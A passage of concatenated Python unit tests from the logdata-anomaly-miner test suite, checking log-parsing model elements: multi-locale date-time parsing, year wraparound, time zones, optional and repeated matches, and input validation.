tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) start_year = multi_locale_dtme.start_year data = b"01.01 11:20:00: it still works" date = b"01.01 11:20:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) dtm = datetime(datetime.now().year+1, 1, 1, 11, 20, tzinfo=timezone.utc) total_seconds = (dtm - datetime(1970, 1, 1, tzinfo=timezone.utc)).total_seconds() self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, total_seconds, None) self.assertEqual(multi_locale_dtme.start_year, start_year + 1) def test13max_time_jump_seconds_in_time(self): """ Test if the max_time_jump_seconds parameter works if the next date is in time. Warnings with unqualified timestamp year wraparound. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, 2020) data = b"01.01 23:59:00: it still works" date = b"01.01 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609545540, None) self.assertEqual(multi_locale_dtme.start_year, 2021) self.assertIn("WARNING:DEBUG:DateTimeModelElement unqualified timestamp year wraparound detected from 2021-01-01T23:59:00+00:00 to " "2021-01-01T23:59:00+00:00", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test14max_time_jump_seconds_exceeded(self): """ Test if the start_year is not updated, when the next date exceeds the max_time_jump_seconds. A time inconsistency warning must occur. """ log_stream = StringIO() logging.basicConfig(stream=log_stream, level=logging.INFO) max_time_jump_seconds = 86400 start_year = 2020 multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", None, None)], start_year=start_year, max_time_jump_seconds=max_time_jump_seconds) data = b"31.12 23:59:00: it still works" date = b"31.12 23:59:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1609459140, None) self.assertEqual(multi_locale_dtme.start_year, start_year) data = b"01.01 23:59:01: it still works" date = b"01.01 23:59:01" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1577923141, None) self.assertEqual(multi_locale_dtme.start_year, start_year) self.assertIn("WARNING:DEBUG:DateTimeModelElement time inconsistencies parsing b'01.01 23:59:01', expecting value around " "1609459140. Check your settings!", log_stream.getvalue()) for handler in logging.root.handlers[:]: logging.root.removeHandler(handler) initialize_loggers(self.aminer_config, getpwnam("aminer").pw_uid, getgrnam("aminer").gr_gid) def test15time_change_cest_cet(self): """Check if the time change from CET to CEST and vice versa work as expected.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S%z", None, None)]) data = b"24.03.2018 11:40:00 CET: it still works" date = b"24.03.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521888000, None) data = b"25.03.2018 11:40:00 CEST: it still works" date = b"25.03.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1521970800, None) data = b"27.10.2018 11:40:00 CEST: it still works" date = b"27.10.2018 11:40:00 CEST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540633200, None) data = b"28.10.2018 11:40:00 CET: it still works" date = b"28.10.2018 11:40:00 CET" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540723200, None) data = b"27.10.2018 11:40:00 EST: it still works" date = b"27.10.2018 11:40:00 EST" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540658400, None) data = b"27.10.2018 11:40:00 PDT: it still works" date = b"27.10.2018 11:40:00 PDT" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540665600, None) data = b"27.10.2018 11:40:00 GMT: it still works" date = b"27.10.2018 11:40:00 GMT" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1540640400, None) def test16same_timestamp_multiple_times(self): """Test if the MultiLocaleDateTimeModelElement can handle multiple same timestamps.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"07.02.2019 11:40:00: it still works" date = b"07.02.2019 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, 1549539600, None) def test17date_before_unix_timestamps(self): """Check if timestamps before the unix timestamp are processed properly.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"01.01.1900 11:40:00: it still works" date = b"01.01.1900 11:40:00" match_context = DummyMatchContext(data) match_element = multi_locale_dtme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_ + "/format0", self.path, date, -2208946800, None) def test18element_id_input_validation(self): """Check if element_id is validated.""" date_formats = [(b"%d.%m.%Y %H:%M:%S", None, None)] self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, "", date_formats) # empty element_id self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, None, date_formats) # None element_id self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, b"path", date_formats) # bytes element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, 123, date_formats) # integer element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, 123.22, date_formats) # float element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, True, date_formats) # boolean element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, {"id": "path"}, date_formats) # dict element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, ["path"], date_formats) # list element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, [], date_formats) # empty list element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, (), date_formats) # empty tuple element_id is not allowed self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, set(), date_formats) # empty set element_id is not allowed def test19date_formats_input_validation(self): """Check if date_format is validated and only valid values can be entered.""" allowed_format_specifiers = b"bdfHMmSsYz%" # check if allowed values do not raise any exception. format_specifiers = b"" for c in allowed_format_specifiers: format_specifiers += b"%" + str(chr(c)).encode() MultiLocaleDateTimeModelElement(self.id_, [(b"%" + str(chr(c)).encode(), None, None)]) # check if all allowed values can not be used together. An exception should be raised, because of multiple month representations # and %s with non-second formats. self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(format_specifiers, None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%m", b"").replace(b"%s", b""), None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(format_specifiers.replace(b"%b", b"").replace(b"%s", b""), None, None)]) MultiLocaleDateTimeModelElement(self.id_, [(b"%s%z%f", None, None)]) for c in allowed_format_specifiers.replace(b"s", b"").replace(b"z", b"").replace(b"f", b"").replace(b"%", b""): self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%" + str(chr(c)).encode(), None, None)]) # test non-existent specifiers for c in b"aceghijklnopqrtuvwxyABCDEFGIJKLNOPQRTUVWXZ": self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%" + str(chr(c)).encode(), None, None)]) # test multiple specifiers. % and z specifiers are allowed multiple times. MultiLocaleDateTimeModelElement(self.id_, [(b"%%%z%z", None, None)]) for c in allowed_format_specifiers.replace(b"%", b"").replace(b"z", b""): self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [( b"%" + str(chr(c)).encode() + b"%" + str(chr(c)).encode(), None, None)]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%s%z%f", None)]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"", None, None)]) # empty self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(None, None, None)]) # None self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [("", None, None)]) # string self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(123, None, None)]) # integer self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(123.22, None, None)]) # float self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(True, None, None)]) # boolean self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [({"id": "path"}, None, None)]) # dict self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(["path"], None, None)]) # list self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [([], None, None)]) # empty list self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [((), None, None)]) # empty tuple self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(set(), None, None)]) # empty set self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [[b"%d.%m.%Y %H:%M:%S", None, None]]) # list inst of tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [()]) # empty tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [tuple(b"%d.%m.%Y %H:%M:%S")]) # 1 tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None)]) # 2 tuple self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None, None)]) # 4 tuple def test20time_zone_input_validation(self): """Check if time_zone is validated and only valid values can be entered.""" en_gb_utf8 = "en_GB.utf8" en_us_utf8 = "en_US.utf8" de_at_utf8 = "de_AT.utf8" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [ (b"%d.%m.%Y %H:%M:%S.%f", None, None), (b"%d.%m.%Y %H:%M:%S%z", None, None), (b"%d.%m.%Y %H:%M:%S", None, None), (b"%d.%m.%YT%H:%M:%S", None, None), (b"%d.%m.%Y", None, None), (b"%H:%M:%S:%f", None, de_at_utf8), (b"%H:%M:%S", None, None), (b"%d %b %Y", None, en_gb_utf8), (b"%dth %b %Y", None, en_gb_utf8), (b"%d/%m/%Y", None, en_gb_utf8), (b"%m-%d-%Y", None, en_us_utf8), (b"%d.%m. %H:%M:%S:%f", None, de_at_utf8)]) for dtme in multi_locale_dtme.date_time_model_elements: self.assertEqual(dtme.time_zone, timezone.utc) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)]) for tz in pytz.all_timezones: MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", pytz.timezone(tz), None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", b"", None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", "UTC", None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", 1, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", 1.25, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", True, None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", [timezone.utc], None)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", {"time_zone": timezone.utc}, None)]) def test21text_locale_input_validation(self): """ Check if text_locale is validated and only valid values can be entered. An exception has to be raised if the locale is not installed on the system. """ MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, "en_US.UTF-8")]) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, ("en_US", "UTF-8"))]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, "")]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, tuple("en_US.UTF-8"))]) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, ("en_US", "UTF-8", "t"))]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, b"")]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, 1)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, 1.2)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, True)]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, ["en_US", "UTF-8"])]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", None, {"en_US": "UTF-8"})]) def test22start_year_input_validation(self): """Check if start_year is validated.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None) self.assertEqual(multi_locale_dtme.start_year, datetime.now().year) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], 2020) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], -630) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], "2020") self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], True) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], 1.25) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], [2020]) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], {"key": 2020}) def test23max_time_jump_seconds_input_validation(self): """Check if max_time_jump_seconds is validated.""" multi_locale_dtme = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m %H:%M:%S", timezone.utc, None)], None) self.assertEqual(multi_locale_dtme.max_time_jump_seconds, 86400) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 100000) MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 1) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, -1) self.assertRaises(ValueError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 0) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, "1000") self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, True) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, 1.25) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, { "key": 2020}) self.assertRaises(TypeError, MultiLocaleDateTimeModelElement, self.id_, [(b"%d.%m.%Y %H:%M:%S", timezone.utc, None)], None, [1000]) def test24get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = MultiLocaleDateTimeModelElement(self.id_, [(b"%d.%m.%Y %H:%M:%S", None, None)]) data = b"07.02.2019 11:40:00: it still works" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(self.path, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/OptionalMatchModelElementTest.py000066400000000000000000000133261437606560100317030ustar00rootroot00000000000000import unittest from aminer.parsing.OptionalMatchModelElement import OptionalMatchModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class OptionalMatchModelElementTest(TestBase): """Unittests for the OptionalMatchModelElement.""" id_ = "optional" path = "path" fixed_id = "fixed" fixed_data = b"fixed data" def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" data = b"fixed data string." value = self.fixed_data match_context = DummyMatchContext(data) fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) optional_match = OptionalMatchModelElement(self.id_, fixed_dme) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s" % (self.path, self.id_), DummyMatchContext(data))]) def test2get_match_element_no_match(self): """Parse not matching substring from MatchContext and check if the MatchContext was not changed.""" optional_match = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"" match_context = DummyMatchContext(data) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, None, None) data = b"other fixed string" value = b"" match_context = DummyMatchContext(data) match_element = optional_match.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, None, None) def test3element_id_input_validation(self): """Check if element_id is validated.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) self.assertRaises(ValueError, OptionalMatchModelElement, "", fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, None, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, b"path", fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, True, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, 123, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, 123.22, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, {"id": "path"}, fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, ["path"], fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, [], fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, (), fixed_dme) self.assertRaises(TypeError, OptionalMatchModelElement, set(), fixed_dme) def test4optional_element_input_validation(self): """Check if optional_element is validated.""" self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, "fixed_dme") self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, None) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, b"path") self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, True) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, 123) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, 123.22) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, {"id": "path"}) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, ["path"]) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, []) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, ()) self.assertRaises(TypeError, OptionalMatchModelElement, self.id_, set()) def test5get_match_element_match_context_input_validation(self): """Check if an exception is raised, when other classes than MatchContext are used in get_match_element.""" model_element = OptionalMatchModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data" model_element.get_match_element(self.path, DummyMatchContext(data)) model_element.get_match_element(self.path, MatchContext(data)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, MatchElement(None, data, None, None)) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data) self.assertRaises(AttributeError, model_element.get_match_element, self.path, data.decode()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123) self.assertRaises(AttributeError, model_element.get_match_element, self.path, 123.22) self.assertRaises(AttributeError, model_element.get_match_element, self.path, True) self.assertRaises(AttributeError, model_element.get_match_element, self.path, None) self.assertRaises(AttributeError, model_element.get_match_element, self.path, []) self.assertRaises(AttributeError, model_element.get_match_element, self.path, {"key": MatchContext(data)}) self.assertRaises(AttributeError, model_element.get_match_element, self.path, set()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, ()) self.assertRaises(AttributeError, model_element.get_match_element, self.path, model_element) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/ParserMatchTest.py000066400000000000000000000044141437606560100270550ustar00rootroot00000000000000import unittest from aminer.parsing.ParserMatch import ParserMatch from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase class ParserMatchTest(TestBase): """Unittests for the ParserMatch.""" match_element = MatchElement("path", b"match_string", b"match_object", None) def test1get_match_element(self): """Test if get_match_element works properly.""" match = ParserMatch(self.match_element) self.assertEqual(match.get_match_element(), self.match_element) def test2get_match_dictionary(self): """Test if MatchElements with and without children are evaluated properly and if multiple calls are handled properly.""" a3 = MatchElement("a3", b"a3", b"a3", None) a2 = MatchElement("a2", b"a2", b"a2", [a3]) a1 = MatchElement("a1", b"a1", b"a1", [a2]) b3 = MatchElement("b3", b"b3", b"b3", None) b2 = MatchElement("b2", b"b2", b"b2", [b3]) b1 = MatchElement("b1", b"b1", b"b1", [b2]) root_element = MatchElement("root", b"root", b"root", [a1, b1]) parser_match = ParserMatch(root_element) dictionary = parser_match.get_match_dictionary() self.assertEqual(dictionary["root"], root_element) self.assertEqual(dictionary["a1"], a1) self.assertEqual(dictionary["a2"], a2) self.assertEqual(dictionary["a3"], a3) self.assertEqual(dictionary["b1"], b1) self.assertEqual(dictionary["b2"], b2) self.assertEqual(dictionary["b3"], b3) def test3match_element_input_validation(self): """Check if element_id is validated.""" self.assertRaises(TypeError, ParserMatch, "string") self.assertRaises(TypeError, ParserMatch, None) self.assertRaises(TypeError, ParserMatch, b"path") self.assertRaises(TypeError, ParserMatch, 123) self.assertRaises(TypeError, ParserMatch, 123.22) self.assertRaises(TypeError, ParserMatch, True) self.assertRaises(TypeError, ParserMatch, {"id": "path"}) self.assertRaises(TypeError, ParserMatch, ["path"]) self.assertRaises(TypeError, ParserMatch, []) self.assertRaises(TypeError, ParserMatch, ()) self.assertRaises(TypeError, ParserMatch, set()) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.6.1/aecid-testsuite/unit/parsing/RepeatedElementDataModelElementTest.py000066400000000000000000000353061437606560100330000ustar00rootroot00000000000000import unittest from aminer.parsing.RepeatedElementDataModelElement import RepeatedElementDataModelElement from aminer.parsing.MatchContext import MatchContext from aminer.parsing.MatchElement import MatchElement from unit.TestBase import TestBase, DummyMatchContext, DummyFixedDataModelElement class RepeatedElementDataModelElementTest(TestBase): """Unittests for the RepeatedElementDataModelElement.""" id_ = "repeated" path = "path" fixed_id = "fixed" fixed_data = b"fixed data " def test1get_match_element_valid_match(self): """Parse matching substring from MatchContext and check if the MatchContext was updated with all characters.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) repeated_dme = RepeatedElementDataModelElement(self.id_, DummyFixedDataModelElement(self.fixed_id, self.fixed_data)) data = b"fixed data string." value = b"fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data))]) data = b"fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % (self.path, self.id_), DummyMatchContext(data)) ]) data = b"fixed data fixed data \nhere is some other string.\nfixed data fixed data " value = b"fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, value, value, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)) ]) def test2get_match_element_min_max_repeats(self): """This test case verifies the functionality of setting the minimal and maximal repeats.""" fixed_dme = DummyFixedDataModelElement(self.fixed_id, self.fixed_data) repeated_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=2, max_repeat=5) same_min_max_repeat_dme = RepeatedElementDataModelElement(self.id_, fixed_dme, min_repeat=3, max_repeat=3) data = b"other data" match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_no_match_results(data, match_element, match_context) data = b"fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data))]) match_context = DummyMatchContext(data) match_element = same_min_max_repeat_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data))]) data = b"fixed data fixed data fixed data fixed data " match_context = DummyMatchContext(data) match_element = repeated_dme.get_match_element(self.path, match_context) self.compare_match_results(data, match_element, match_context, self.id_, self.path, data, data, [ fixed_dme.get_match_element("%s/%s/0" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/1" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/2" % (self.path, self.id_), DummyMatchContext(data)), fixed_dme.get_match_element("%s/%s/3" % 